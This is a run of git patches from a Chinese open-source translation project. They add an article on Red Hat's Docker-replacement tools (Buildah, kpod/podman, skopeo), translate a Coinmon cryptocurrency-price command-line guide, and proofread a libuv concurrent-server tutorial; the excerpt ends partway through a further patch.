Content-Transfer-Encoding: 8bit
---
...20 Containers without Docker at Red Hat.md | 115 ++++++++++++++++++
1 file changed, 115 insertions(+)
create mode 100644 sources/tech/20171220 Containers without Docker at Red Hat.md
diff --git a/sources/tech/20171220 Containers without Docker at Red Hat.md b/sources/tech/20171220 Containers without Docker at Red Hat.md
new file mode 100644
index 0000000000..e5fc2db4f9
--- /dev/null
+++ b/sources/tech/20171220 Containers without Docker at Red Hat.md
@@ -0,0 +1,115 @@
+Containers without Docker at Red Hat
+======
+
+The Docker (now [Moby][1]) project has done a lot to popularize containers in recent years. Along the way, though, it has generated concerns about its concentration of functionality into a single, monolithic system under the control of a single daemon running with root privileges: `dockerd`. Those concerns were reflected in a [talk][2] by Dan Walsh, head of the container team at Red Hat, at [KubeCon \+ CloudNativeCon][3]. Walsh spoke about the work the container team is doing to replace Docker with a set of smaller, interoperable components. His rallying cry is "no big fat daemons" as he finds them to be contrary to the venerated Unix philosophy.
+
+### The quest to modularize Docker
+
+As we saw in an [earlier article][4], the basic set of container operations is not that complicated: you need to pull a container image, create a container from the image, and start it. On top of that, you need to be able to build images and push them to a registry. Most people still use Docker for all of those steps but, as it turns out, Docker isn't the only name in town anymore: an early alternative was `rkt`, which led to the creation of various standards like CRI (runtime), OCI (image), and CNI (networking) that allow backends like [CRI-O][5] or Docker to interoperate with, for example, [Kubernetes][6].
+
+These standards led Red Hat to create a set of "core utils" like the CRI-O runtime that implements the parts of the standards that Kubernetes needs. But Red Hat's [OpenShift][7] project needs more than what Kubernetes provides. Developers will want to be able to build containers and push them to the registry. Those operations need a whole different bag of tricks.
+
+It turns out that there are multiple tools to build containers right now. Apart from Docker itself, a [session][8] from Michael Ducy of Sysdig reviewed eight image builders, and that's probably not all of them. Ducy identified the ideal build tool as one that would create a minimal image in a reproducible way. A minimal image is one where there is no operating system, only the application and its essential dependencies. Ducy identified [Distroless][9], [Smith][10], and [Source-to-Image][11] as good tools to build minimal images, which he called "micro-containers".
+
+A reproducible container is one that you can build multiple times and always get the same result. For that, Ducy said you have to use a "declarative" approach (as opposed to "imperative"), which is understandable given that he comes from the Chef configuration-management world. He gave the examples of [Ansible Container][12], [Habitat][13], [nixos-container][14], and Smith (yes, again) as being good approaches, provided you were familiar with their domain-specific languages. He added that Habitat ships its own supervisor in its containers, which may be superfluous if you already have an external one, like systemd, Docker, or Kubernetes. To complete the list, we should mention the new [BuildKit][15] from Docker and [Buildah][16], which is part of Red Hat's [Project Atomic][17].
+
+### Building containers with Buildah
+
+![\[Buildah logo\]][18] Buildah's name apparently comes from Walsh's colorful [Boston accent][19]; the Boston theme permeates the branding of the tool: the logo, for example, is a Boston terrier dog (seen at right). This project takes a different approach from Ducy's decree: instead of enforcing a declarative configuration-management approach to containers, why not build simple tools that can be used by your favorite configuration-management tool? If you want to use regular command-line commands like `cp` (instead of Docker's custom `COPY` directive, for example), you can. But you can also use Ansible or Puppet, OS-specific or language-specific installers like APT or pip, or whatever other system to provision the content of your containers. This is what building a container looks like with regular shell commands and simply using `make` to install a binary inside the container:
+```
+ # pull a base image, equivalent to a Dockerfile's FROM command
+ buildah from redhat
+
+ # mount the base image to work on it
+ crt=$(buildah mount)
+ cp foo $crt
+ make install DESTDIR=$crt
+
+ # then make a snapshot
+ buildah commit
+
+```
+
+An interesting thing with this approach is that, since you reuse normal build tools from the host environment, you can build really minimal images because you don't need to install all the dependencies in the image. Usually, when building a container image, the target application build dependencies need to be installed within the container. For example, building from source usually requires a compiler toolchain in the container, because it is not meant to access the host environment. A lot of containers will also ship basic Unix tools like `ps` or `bash` which are not actually necessary in a micro-container. Developers often forget to (or simply can't) remove some dependencies from the built containers; that common practice creates unnecessary overhead and attack surface.
+
+The modular approach of Buildah means you can run at least parts of the build as non-root: the `mount` command still needs the `CAP_SYS_ADMIN` capability, but there is an [issue][20] open to resolve this. However, Buildah [shares][21] the same [limitation][22] as Docker in that it can't build containers inside containers. For Docker, you need to run the container in "privileged" mode, which is not possible in certain environments (like [GitLab Continuous Integration][23], for example) and, even when it is possible, the configuration is [messy][24] at best.
+
+The manual commit step allows fine-grained control over when to create container snapshots. While in a Dockerfile every line creates a new snapshot, with Buildah commit checkpoints are explicitly chosen, which reduces unnecessary snapshots and saves disk space. This is useful to isolate sensitive material like private keys or passwords which sometimes mistakenly end up in public images as well.
+
+While Docker builds non-standard, Docker-specific images, Buildah produces standard OCI images among [other output formats][25]. For backward compatibility, it has a command called `build-using-dockerfile` or [`buildah bud`][26] that parses normal Dockerfiles. Buildah has a `enter` command to inspect images from the inside directly and a `run` command to start containers on the fly. It does all the work without any "fat daemon" running in the background and uses standard tools like `runc`.
+
+Ducy's criticism of Buildah was that it was not declarative, which made it less reproducible. When allowing shell commands anything can happen: for example, a shell script might download arbitrary binaries, without any way of subsequently retracing where those come from. Shell command effects may vary according to the environment. In contrast to shell-based tools, configuration-management systems like Puppet or Chef are designed to "converge" over a final configuration that is more reliable, at least in theory: in practice you can call shell commands from configuration-management systems. Walsh, however, argued that existing configuration management can be used on top of Buildah, but it doesn't force users down that path. This fits well with the classic "separation" principle of the Unix philosophy ("mechanism not policy").
+
+At this point, Buildah is in beta and Red Hat is working on integrating it into OpenShift. I have tested Buildah while writing this article and, short of some documentation issues, it generally works reliably. It could use some polishing in error handling, but it is definitely a great asset to add to your container toolbox.
+
+### Replacing the rest of the Docker command-line
+
+Walsh continued his presentation by giving an overview of another project that Red Hat is working on, tentatively called [libpod][27]. The name derives from a "pod" in Kubernetes, which is a way to group containers inside a host, to share namespaces, for example.
+
+Libpod includes the `kpod` command to inspect and manipulate container storage directly. Walsh explained this can be useful if, for example, `dockerd` hangs or if a Kubernetes cluster crashes. `kpod` is basically an independent re-implementation of the `docker` command-line tool. There is a command to list running containers (`kpod ps`) or images (`kpod images`). In fact, there is a [translation cheat sheet][28] documenting all Docker commands with a `kpod` equivalent.
+
+One of the nice things with the modular approach is that when you run a container with `kpod run`, the container is directly started as a subprocess of the current shell, instead of a subprocess of `dockerd`. In theory, this allows running containers directly from systemd, removing the duplicate work `dockerd` is doing. It enables things like [socket-activated containers][29], which is something that is [not straightforward][30] to do with Docker, or [even with Kubernetes][31] right now. In my experiments, however, I have found that containers started with `kpod` lack some fundamental functionality, namely networking (!), although there is an [issue in progress][32] to complete that implementation.
+
+A final command we haven't covered is `push`. While the above commands provide a good process for working with local containers, they don't cover remote registries, which allow developers to actively collaborate on application packaging. Registries are also an essential part of a continuous-deployment framework. This is where the [skopeo][33] project comes in. Skopeo is another Atomic project that "performs various operations on container images and image repositories", according to the `README` file. It was originally designed to inspect the contents of container registries without actually downloading the sometimes voluminous images as `docker pull` does. Docker [refused patches][34] to support inspection, suggesting the creation of a separate tool, which led to Skopeo. After `pull`, `push` was the logical next step and Skopeo can now do a bunch of other things like copying and converting images between registries without having to store a copy locally. Because this functionality was useful to other projects as well, a lot of the Skopeo code now lives in a reusable library called [containers/image][35]. That library is in turn used by [Pivotal][36], Google's [container-diff][37], `kpod push`, and `buildah push`.
+
+`kpod` is not directly tied to Kubernetes, so the name might change in the future -- especially since Red Hat legal has not cleared the name yet. (In fact, just as this article was going to "press", the name was changed to [`podman`][38].) The team wants to implement more "pod-level" commands which would allow operations on multiple containers, a bit like what [`docker compose`][39] might do. But at that level, a better tool might be [Kompose][40] which can execute [Compose YAML files][41] into a Kubernetes cluster. Some Docker commands (like [`swarm`][42]) will never be implemented, on purpose, as they are best left for Kubernetes itself to handle.
+
+It seems that the effort to modularize Docker that started a few years ago is finally bearing fruit. While, at this point, `kpod` is under heavy development and probably should not be used in production, the design of those different tools is certainly interesting; a lot of it is ready for development environments. Right now, the only way to install libpod is to compile it from source, but we should expect packages coming out for your favorite distribution eventually.
+
+> This article [first appeared][43] in the [Linux Weekly News][44].
+
+--------------------------------------------------------------------------------
+
+via: https://anarc.at/blog/2017-12-20-docker-without-docker/
+
+作者:[À propos de moi][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://anarc.at
+[1]:https://mobyproject.org/
+[2]:https://kccncna17.sched.com/event/CU8j/cri-o-hosted-by-daniel-walsh-red-hat
+[3]:http://events.linuxfoundation.org/events/kubecon-and-cloudnativecon-north-america
+[4]:https://lwn.net/Articles/741897/
+[5]:http://cri-o.io/
+[6]:https://kubernetes.io/
+[7]:https://www.openshift.com/
+[8]:https://kccncna17.sched.com/event/CU6B/building-better-containers-a-survey-of-container-build-tools-i-michael-ducy-chef
+[9]:https://github.com/GoogleCloudPlatform/distroless
+[10]:https://github.com/oracle/smith
+[11]:https://github.com/openshift/source-to-image
+[12]:https://www.ansible.com/ansible-container
+[13]:https://www.habitat.sh/
+[14]:https://nixos.org/nixos/manual/#ch-containers
+[15]:https://github.com/moby/buildkit
+[16]:https://github.com/projectatomic/buildah
+[17]:https://www.projectatomic.io/
+[18]:https://raw.githubusercontent.com/projectatomic/buildah/master/logos/buildah-logomark_large.png (Buildah logo)
+[19]:https://en.wikipedia.org/wiki/Boston_accent
+[20]:https://github.com/projectatomic/buildah/issues/171
+[21]:https://github.com/projectatomic/buildah/issues/158
+[22]:https://github.com/moby/moby/issues/27886#issuecomment-281278525
+[23]:https://about.gitlab.com/features/gitlab-ci-cd/
+[24]:https://jpetazzo.github.io/2015/09/03/do-not-use-docker-in-docker-for-ci/
+[25]:https://github.com/projectatomic/buildah/blob/master/docs/buildah-push.md
+[26]:https://github.com/projectatomic/buildah/blob/master/docs/buildah-bud.md
+[27]:https://github.com/projectatomic/libpod
+[28]:https://github.com/projectatomic/libpod/blob/master/transfer.md#development-transfer
+[29]:http://0pointer.de/blog/projects/socket-activated-containers.html
+[30]:https://legacy-developer.atlassian.com/blog/2015/03/docker-systemd-socket-activation/
+[31]:https://github.com/kubernetes/kubernetes/issues/484
+[32]:https://github.com/projectatomic/libpod/issues/129
+[33]:https://github.com/projectatomic/skopeo
+[34]:https://github.com/moby/moby/pull/14258
+[35]:https://github.com/containers/image
+[36]:https://pivotal.io/
+[37]:https://github.com/GoogleCloudPlatform/container-diff
+[38]:https://github.com/projectatomic/libpod/blob/master/docs/podman.1.md
+[39]:https://docs.docker.com/compose/overview/#compose-documentation
+[40]:http://kompose.io/
+[41]:https://docs.docker.com/compose/compose-file/
+[42]:https://docs.docker.com/engine/swarm/
+[43]:https://lwn.net/Articles/741841/
+[44]:http://lwn.net/
From de3feeea6d61e766f85c78c14e214441129005ed Mon Sep 17 00:00:00 2001
From: geekpi
Date: Mon, 8 Jan 2018 09:17:21 +0800
Subject: [PATCH 152/371] translated
---
... Cryptocurrency Prices From Commandline.md | 89 -------------------
... Cryptocurrency Prices From Commandline.md | 88 ++++++++++++++++++
2 files changed, 88 insertions(+), 89 deletions(-)
delete mode 100644 sources/tech/20171123 Check Cryptocurrency Prices From Commandline.md
create mode 100644 translated/tech/20171123 Check Cryptocurrency Prices From Commandline.md
diff --git a/sources/tech/20171123 Check Cryptocurrency Prices From Commandline.md b/sources/tech/20171123 Check Cryptocurrency Prices From Commandline.md
deleted file mode 100644
index 4a7e85ce0c..0000000000
--- a/sources/tech/20171123 Check Cryptocurrency Prices From Commandline.md
+++ /dev/null
@@ -1,89 +0,0 @@
-translating---geekpi
-
-Check Cryptocurrency Prices From Commandline
-======
-![配图](https://www.ostechnix.com/wp-content/uploads/2017/11/bitcoin-1-720x340.jpg)
-A while ago, we published a guide about **[Cli-Fyi][1] ** - a potentially useful command line query tool. Using Cli-Fyi, we can easily find out the latest price of a cryptocurrency and lots of other useful details. Today, we are going to see yet another cryptcurrency price checker tool called **" Coinmon"**. Unlike Cli.Fyi, Coinmon is only for checking the price of various cryptocurrencies. Nothing more! Coinmon will check cryptocurrencies' prices, changes right from your Terminal. It will fetch all details from from [coinmarketcap.com][2] APIs. It is quite useful for those who are both **Crypto investors** and **Engineers**.
-
-### Installing Coinmon
-
-Make sure you have Node.js and Npm installed on your system. If you don't have Node.js and/or npm installed on your machine, refer the following link to install them.
-
-Once Node.js and Npm installed, run the following command from your Terminal to install Coinmon.
-```
-sudo npm install -g coinmon
-```
-
-### Check Cryptocurrency Prices From Commandline
-
-Run the following command to check the top 10 cryptocurrencies ranked by their market cap:
-```
-coinmon
-```
-
-Sample output would be:
-
-[![][3]][4]
-
-Like I said, if you run the coinmon without any parameters, it will display the top 10 cryptocurrencies. You can also find top top n cryptocurrencies, for example 20, by using "-t" flag.
-```
-coinmon -t 20
-```
-
-All prices will be displayed in USD by default. You can also convert price from USD to another currency by using "-c" flag.
-
-For instance, to convert the prices to INR (Indian Rupee), run:
-```
-coinmon -c inr
-```
-
-[![][3]][5]
-
-Currently, Coinmon supports AUD, BRL, CAD, CHF, CLP, CNY, CZK, DKK, EUR, GBP, HKD, HUF, IDR, ILS, INR, JPY, KRW, MXN, MYR, NOK, NZD, PHP, PKR, PLN, RUB, SEK, SGD, THB, TRY, TWD, ZAR currencies.
-
-It is also possible to search the prices using the symbol of a cryptocurrency.
-```
-coinmon -f btc
-```
-
-Here, **btc** is the symbol of Bitcoin cryptocurrency. You can view the symbols of all available cryptocurrencies [**here**][6].
-
-For more details, refer coinmon's help section:
-```
-$ coinmon -h
-
-Usage: coinmon [options]
-
-Options:
-
- -V, --version output the version number
- -c, --convert [currency] Convert to your fiat currency (default: usd)
- -f, --find [symbol] Find specific coin data with coin symbol (can be a comma seperated list) (default: )
- -t, --top [index] Show the top coins ranked from 1 - [index] according to the market cap (default: null)
- -H, --humanize [enable] Show market cap as a humanized number, default true (default: true)
- -h, --help output usage information
-```
-
-Hope this helps. More good stuffs to come. Stay tuned!
-
-Cheers!
-
-
-
---------------------------------------------------------------------------------
-
-via: https://www.ostechnix.com/coinmon-check-cryptocurrency-prices-commandline/
-
-作者:[SK][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.ostechnix.com/author/sk/
-[1]:https://www.ostechnix.com/cli-fyi-quick-easy-way-fetch-information-ips-emails-domains-lots/
-[2]:https://coinmarketcap.com/
-[3]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
-[4]:http://www.ostechnix.com/wp-content/uploads/2017/11/coinmon-1.png ()
-[5]:http://www.ostechnix.com/wp-content/uploads/2017/11/coinmon-2.png ()
-[6]:https://en.wikipedia.org/wiki/List_of_cryptocurrencies
diff --git a/translated/tech/20171123 Check Cryptocurrency Prices From Commandline.md b/translated/tech/20171123 Check Cryptocurrency Prices From Commandline.md
new file mode 100644
index 0000000000..ba4a7bdefe
--- /dev/null
+++ b/translated/tech/20171123 Check Cryptocurrency Prices From Commandline.md
@@ -0,0 +1,88 @@
+从命令行查看加密货币价格
+======
+![配图](https://www.ostechnix.com/wp-content/uploads/2017/11/bitcoin-1-720x340.jpg)
+前段时间,我们发布了一个关于 **[Cli-Fyi][1] ** 的指南 - 一个潜在有用的命令行查询工具。使用 Cli-Fyi,我们可以很容易地了解加密货币的最新价格和许多其他有用的细节。今天,我们将看到另一个名为 **“Coinmon”** 的加密货币价格查看工具。不像 Cli.Fyi,Coinmon 只能用来查看不同加密货币的价格。没有其他功能!Coinmon 会检查加密货币的价格,并立即直接从你的终端修改价格。它将从 [coinmarketcap.com][2] API 获取所有详细信息。对于那些 **加密货币投资者**和**工程师**来说是非常有用的。
+
+### 安装 Coinmon
+
+确保你的系统上安装了 Node.js 和 Npm。如果你的机器上没有安装 Node.js 和/或 npm,请参考以下链接进行安装。
+
+安装完 Node.js 和 Npm 后,从终端运行以下命令安装 Coinmon。
+```
+sudo npm install -g coinmon
+```
+
+### 从命令行查看加密货币价格
+
+运行以下命令查看市值排名的前 10 位的加密货币:
+```
+coinmon
+```
+
+示例输出:
+
+[![][3]][4]
+
+如我所说,如果你不带任何参数运行 coinmon,它将显示前 10 位加密货币。你还可以使用 “-t” 标志查看最高的 n 位加密货币,例如 20。
+```
+coinmon -t 20
+```
+
+所有价格默认以美元显示。你还可以使用 “-c” 标志将价格从美元转换为另一种货币。
+
+例如,要将价格转换为 INR(印度卢比),运行:
+```
+coinmon -c inr
+```
+
+[![][3]][5]
+
+目前,Coinmon 支持 AUD、BRL、CAD、CHF、CLP、CNY、CZK、DKK、EUR、GBP、HKD、HUF、IDR、ILS、INR、JPY、KRW、MXN、MYR、NOK、NZD、PHP、PKR、PLN、RUB、SEK、SGD、THB、TRY、TWD、ZAR 这些货币。
+
+也可以使用加密货币的符号来搜索价格。
+```
+coinmon -f btc
+```
+
+这里,**btc** 是比特币的符号。你可以在[**这**][6]查看所有可用的加密货币的符号。
+
+有关更多详情,请参阅coinmon的帮助部分:
+
+```
+$ coinmon -h
+
+Usage: coinmon [options]
+
+Options:
+
+ -V, --version output the version number
+ -c, --convert [currency] Convert to your fiat currency (default: usd)
+ -f, --find [symbol] Find specific coin data with coin symbol (can be a comma seperated list) (default: )
+ -t, --top [index] Show the top coins ranked from 1 - [index] according to the market cap (default: null)
+ -H, --humanize [enable] Show market cap as a humanized number, default true (default: true)
+ -h, --help output usage information
+```
+
+希望这个有帮助。会有更好的东西。敬请关注!
+
+干杯!
+
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.ostechnix.com/coinmon-check-cryptocurrency-prices-commandline/
+
+作者:[SK][a]
+译者:[geekpi](https://github.com/geekpi)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.ostechnix.com/author/sk/
+[1]:https://www.ostechnix.com/cli-fyi-quick-easy-way-fetch-information-ips-emails-domains-lots/
+[2]:https://coinmarketcap.com/
+[3]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
+[4]:http://www.ostechnix.com/wp-content/uploads/2017/11/coinmon-1.png ()
+[5]:http://www.ostechnix.com/wp-content/uploads/2017/11/coinmon-2.png ()
+[6]:https://en.wikipedia.org/wiki/List_of_cryptocurrencies
From a20a283877253e672cef76cc12a993a33224fd01 Mon Sep 17 00:00:00 2001
From: geekpi
Date: Mon, 8 Jan 2018 09:19:35 +0800
Subject: [PATCH 153/371] translated
---
.../20171016 Fixing vim in Debian - There and back again.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/sources/tech/20171016 Fixing vim in Debian - There and back again.md b/sources/tech/20171016 Fixing vim in Debian - There and back again.md
index 0b67edcf63..622b9fe885 100644
--- a/sources/tech/20171016 Fixing vim in Debian - There and back again.md
+++ b/sources/tech/20171016 Fixing vim in Debian - There and back again.md
@@ -1,3 +1,5 @@
+translating---geekpi
+
Fixing vim in Debian – There and back again
======
I was wondering for quite some time why on my server vim behaves so stupid with respect to the mouse: Jumping around, copy and paste wasn't possible the usual way. All this despite having
From e4bc03b48bb884b9487ff597c67fdcd2f556b897 Mon Sep 17 00:00:00 2001
From: wxy
Date: Mon, 8 Jan 2018 09:59:47 +0800
Subject: [PATCH 154/371] PRF:20171109 Concurrent Servers- Part 4 - libuv.md
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
部分校对
---
...1109 Concurrent Servers- Part 4 - libuv.md | 52 +++++++++----------
1 file changed, 24 insertions(+), 28 deletions(-)
diff --git a/translated/tech/20171109 Concurrent Servers- Part 4 - libuv.md b/translated/tech/20171109 Concurrent Servers- Part 4 - libuv.md
index 07994c67b1..e819027b7d 100644
--- a/translated/tech/20171109 Concurrent Servers- Part 4 - libuv.md
+++ b/translated/tech/20171109 Concurrent Servers- Part 4 - libuv.md
@@ -1,31 +1,28 @@
-[并发服务器:第四部分 - libuv][17]
+并发服务器(四):libuv
============================================================
-这是写并发网络服务器系列文章的第四部分。在这一部分中,我们将使用 libuv 去再次重写我们的服务器,并且也讨论关于使用一个线程池在回调中去处理耗时任务。最终,我们去看一下底层的 libuv,花一点时间去学习如何用异步 API 对文件系统阻塞操作进行封装。
+这是并发网络服务器系列文章的第四部分。在这一部分中,我们将使用 libuv 再次重写我们的服务器,并且也会讨论关于使用一个线程池在回调中去处理耗时任务。最终,我们去看一下底层的 libuv,花一点时间去学习如何用异步 API 对文件系统阻塞操作进行封装。
-这一系列的所有文章包括:
+本系列的所有文章:
-* [第一部分 - 简介][7]
+* [第一节 - 简介][7]
+* [第二节 - 线程][8]
+* [第三节 - 事件驱动][9]
+* [第四节 - libuv][10]
-* [第二部分 - 线程][8]
+### 使用 libuv 抽象出事件驱动循环
-* [第三部分 - 事件驱动][9]
+在 [第三节][11] 中,我们看到了基于 `select` 和 `epoll` 的服务器的相似之处,并且,我说过,在它们之间抽象出细微的差别是件很有吸引力的事。许多库已经做到了这些,所以在这一部分中我将去选一个并使用它。我选的这个库是 [libuv][12],它最初设计用于 Node.js 底层的可移植平台层,并且,后来发现在其它的项目中已有使用。libuv 是用 C 写的,因此,它具有很高的可移植性,非常适用嵌入到像 JavaScript 和 Python 这样的高级语言中。
-* [第四部分 - libuv][10]
-
-### 使用 Linux 抽象出事件驱动循环
-
-在 [第三部分][11] 中,我们看到了基于 `select` 和 `epoll` 的相似之处,并且,我说过,在它们之间抽象出细微的差别是件很有魅力的事。Numerous 库已经做到了这些,但是,因为在这一部分中,我将去选一个并使用它。我选的这个库是 [libuv][12],它最初设计用于 Node.js 底层的轻便的平台层,并且,后来发现在其它的项目中已有使用。libuv 是用 C 写的,因此,它具有很高的可移植性,非常适用嵌入到像 JavaScript 和 Python 这样的高级语言中。
-
-虽然 libuv 为抽象出底层平台细节已经有了一个非常大的框架,但它仍然是一个以 _事件循环_ 思想为中心的。在我们第三部分的事件驱动服务器中,事件循环在 main 函数中是很明确的;当使用 libuv 时,循环通常隐藏在库自身中,而用户代码仅需要注册事件句柄(作为一个回调函数)和运行这个循环。此外,libuv 将为给定的平台实现更快的事件循环实现。对于 Linux 它是 epoll,等等。
+虽然 libuv 为抽象出底层平台细节已经变成了一个相当大的框架,但它仍然是以 _事件循环_ 思想为中心的。在我们第三部分的事件驱动服务器中,事件循环在 `main` 函数中是很明确的;当使用 libuv 时,该循环通常隐藏在库自身中,而用户代码仅需要注册事件句柄(作为一个回调函数)和运行这个循环。此外,libuv 会在给定的平台上使用更快的事件循环实现,对于 Linux 它是 epoll,等等。
![libuv loop](https://eli.thegreenplace.net/images/2017/libuvloop.png)
-libuv 支持多路事件循环,并且,因此一个事件循环在库中是非常重要的;它有一个句柄 - `uv_loop_t`,和创建/杀死/启动/停止循环的函数。也就是说,在这篇文章中,我将仅需要使用 “默认的” 循环,libuv 可通过 `uv_default_loop()` 提供它;多路循环大多用于多线程事件驱动的服务器,这是一个更高级别的话题,我将留在这一系列文章的以后部分。
+libuv 支持多路事件循环,并且,因此事件循环在库中是非常重要的;它有一个句柄 —— `uv_loop_t`,和创建/杀死/启动/停止循环的函数。也就是说,在这篇文章中,我将仅需要使用 “默认的” 循环,libuv 可通过 `uv_default_loop()` 提供它;多路循环大多用于多线程事件驱动的服务器,这是一个更高级别的话题,我将留在这一系列文章的以后部分。
### 使用 libuv 的并发服务器
-为了对 libuv 有一个更深的印象,让我们跳转到我们的可靠的协议服务器,它通过我们的这个系列已经有了一个强大的重新实现。这个服务器的结构与第三部分中的基于 select 和 epoll 的服务器有一些相似之处。因为,它也依赖回调。完整的 [示例代码在这里][13];我们开始设置这个服务器的套接字绑定到一个本地端口:
+为了对 libuv 有一个更深的印象,让我们跳转到我们的可靠协议的服务器,它通过我们的这个系列已经有了一个强大的重新实现。这个服务器的结构与第三部分中的基于 select 和 epoll 的服务器有一些相似之处,因为,它也依赖回调。完整的 [示例代码在这里][13];我们开始设置这个服务器的套接字绑定到一个本地端口:
```
int portnum = 9090;
@@ -50,11 +47,11 @@ if ((rc = uv_tcp_bind(&server_stream, (const struct sockaddr*)&server_address, 0
}
```
-除了它被封装进 libuv APIs 中之外,你看到的是一个相当标准的套接字。在它的返回中,我们取得一个可工作于任何 libuv 支持的平台上的轻便的接口。
+除了它被封装进 libuv API 中之外,你看到的是一个相当标准的套接字。在它的返回中,我们取得一个可工作于任何 libuv 支持的平台上的可移植接口。
-这些代码也很认真负责地演示了错误处理;多数的 libuv 函数返回一个整数状态,返回一个负数意味着出现了一个错误。在我们的服务器中,我们把这些错误按致命的问题处理,但也可以设想为一个更优雅的恢复。
+这些代码也展示了很认真负责的错误处理;多数的 libuv 函数返回一个整数状态,返回一个负数意味着出现了一个错误。在我们的服务器中,我们把这些错误看做致命问题进行处理,但也可以设想为一个更优雅的错误恢复。
-现在,那个套接字已经绑定,是时候去监听它了。这里我们运行一个回调注册:
+现在,那个套接字已经绑定,是时候去监听它了。这里我们运行首个回调注册:
```
// Listen on the socket for new peers to connect. When a new peer connects,
@@ -64,9 +61,9 @@ if ((rc = uv_listen((uv_stream_t*)&server_stream, N_BACKLOG, on_peer_connected))
}
```
-当新的对端连接到这个套接字,`uv_listen` 将被调用去注册一个事件循环回调。我们的回调在这里被称为 `on_peer_connected`,并且我们一会儿将去检测它。
+`uv_listen` 注册一个事件回调,当新的对端连接到这个套接字时将会调用事件循环。我们的回调在这里被称为 `on_peer_connected`,我们一会儿将去查看它。
-最终,main 运行这个 libuv 循环,直到它被停止(`uv_run` 仅在循环被停止或者发生错误时返回)
+最终,`main` 运行这个 libuv 循环,直到它被停止(`uv_run` 仅在循环被停止或者发生错误时返回)。
```
// Run the libuv event loop.
@@ -76,7 +73,7 @@ uv_run(uv_default_loop(), UV_RUN_DEFAULT);
return uv_loop_close(uv_default_loop());
```
-注意,那个仅是一个单一的通过 main 优先去运行的事件循环回调;我们不久将看到怎么去添加更多的另外的回调。在事件循环的整个运行时中,添加和删除回调并不是一个问题 - 事实上,大多数服务器就是这么写的。
+注意,在运行事件循环之前,只有一个回调是通过 main 注册的;我们稍后将看到怎么去添加更多的回调。在事件循环的整个运行过程中,添加和删除回调并不是一个问题 —— 事实上,大多数服务器就是这么写的。
这是一个 `on_peer_connected`,它处理到服务器的新的客户端连接:
@@ -135,9 +132,8 @@ void on_peer_connected(uv_stream_t* server_stream, int status) {
这些代码都有很好的注释,但是,这里有一些重要的 libuv 语法我想去强调一下:
-* 进入回调中的自定义数据:因为 C 还没有停用,这可能是个挑战,libuv 在它的处理类型中有一个 `void*` 数据域;这些域可以被用于进入到用户数据。例如,注意 `client->data` 是如何指向到一个 `peer_state_t` 结构上,以便于通过 `uv_write` 和 `uv_read_start` 注册的回调可以知道它们正在处理的是哪个客户端的数据。
-
-* 内存管理:事件驱动编程在语言中使用垃圾回收是非常容易的,因为,回调通常运行在一个它们注册的完全不同的栈框架中,使得基于栈的内存管理很困难。它总是需要传递堆分配的数据到 libuv 回调中(当所有回调运行时,除了 main,其它的都运行在栈上),并且,为了避免泄漏,许多情况下都要求这些数据去安全释放。这些都是些需要实践的内容 [[1]][6]。
+* 传入自定义数据到回调中:因为 C 还没有闭包,这可能是个挑战,libuv 在它的所有的处理类型中有一个 `void* data` 字段;这些字段可以被用于传递用户数据。例如,注意 `client->data` 是如何指向到一个 `peer_state_t` 结构上,以便于 `uv_write` 和 `uv_read_start` 注册的回调可以知道它们正在处理的是哪个客户端的数据。
+* 内存管理:在带有垃圾回收的语言中进行事件驱动编程是非常容易的,因为,回调通常运行在一个它们注册的完全不同的栈帧中,使得基于栈的内存管理很困难。它总是需要传递堆分配的数据到 libuv 回调中(当所有回调运行时,除了 main,其它的都运行在栈上),并且,为了避免泄漏,许多情况下都要求这些数据去安全释放。这些都是些需要实践的内容 [[1]][6]。
这个服务器上对端的状态如下:
@@ -479,11 +475,11 @@ via: https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/
[4]:https://eli.thegreenplace.net/tag/concurrency
[5]:https://eli.thegreenplace.net/tag/c-c
[6]:https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/#id4
-[7]:http://eli.thegreenplace.net/2017/concurrent-servers-part-1-introduction/
-[8]:http://eli.thegreenplace.net/2017/concurrent-servers-part-2-threads/
-[9]:http://eli.thegreenplace.net/2017/concurrent-servers-part-3-event-driven/
+[7]:https://linux.cn/article-8993-1.html
+[8]:https://linux.cn/article-9002-1.html
+[9]:https://linux.cn/article-9117-1.html
[10]:http://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/
-[11]:http://eli.thegreenplace.net/2017/concurrent-servers-part-3-event-driven/
+[11]:https://linux.cn/article-9117-1.html
[12]:http://libuv.org/
[13]:https://github.com/eliben/code-for-blog/blob/master/2017/async-socket-server/uv-server.c
[14]:https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/#id5
From 4d0e68750480f34496d2ead9c3600e2840c8ba6e Mon Sep 17 00:00:00 2001
From: wxy
Date: Mon, 8 Jan 2018 10:10:19 +0800
Subject: [PATCH 155/371] PRF&PUB:20170515 Commands to check System & Hardware
Information.md
@geekpi
---
... to check System & Hardware Information.md | 63 ++++++++++++-------
1 file changed, 40 insertions(+), 23 deletions(-)
rename {translated/tech => published}/20170515 Commands to check System & Hardware Information.md (64%)
diff --git a/translated/tech/20170515 Commands to check System & Hardware Information.md b/published/20170515 Commands to check System & Hardware Information.md
similarity index 64%
rename from translated/tech/20170515 Commands to check System & Hardware Information.md
rename to published/20170515 Commands to check System & Hardware Information.md
index e8469797c6..ba947a7f43 100644
--- a/translated/tech/20170515 Commands to check System & Hardware Information.md
+++ b/published/20170515 Commands to check System & Hardware Information.md
@@ -1,84 +1,101 @@
检查系统和硬件信息的命令
